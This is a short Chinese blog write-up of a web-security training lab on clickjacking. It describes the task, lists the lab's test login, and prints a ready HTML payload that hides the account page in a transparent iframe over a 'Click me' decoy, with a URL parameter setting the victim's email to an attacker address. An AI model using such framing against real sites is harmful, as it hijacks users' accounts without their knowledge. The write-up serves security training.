Lab: Clickjacking with form input data prefilled from a URL parameter：使用从 URL 参数预填充的表单输入数据进行点击劫持...-CSDN博客

本文链接：https://blog.csdn.net/ZripenYe/article/details/120793771

靶场内容：

该实验室扩展了基本的点击劫持例如在实验室：基本点击劫持与CSRF令牌保护。
该实验室的目标是通过使用 URL 参数预填充表单并诱使用户无意中单击“更新电子邮件”按钮来更改用户的电子邮件地址。
为了解决这个实验，制作一些 HTML 来构建帐户页面，并通过单击“点击我”诱饵来欺骗用户更新他们的电子邮件地址。更改电子邮件地址后，实验室就解决了。
您可以使用以下凭据登录自己的帐户： wiener:peter

靶场分析

这个实验也很简单，目的是通过点击劫持诱导目标点击更新邮箱
而这个邮箱就是我们黑客的邮箱

<style>
   iframe {
       position:relative;
       width:700;
       height: 500;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:450;
       left:80;
       z-index: 1;
   }
</style>
<div>Click me</div>
<iframe src="https://acf81fac1e709c0d806f1378005800f7.web-security-academy.net/my-account?email=hacker@attacker-website.com"></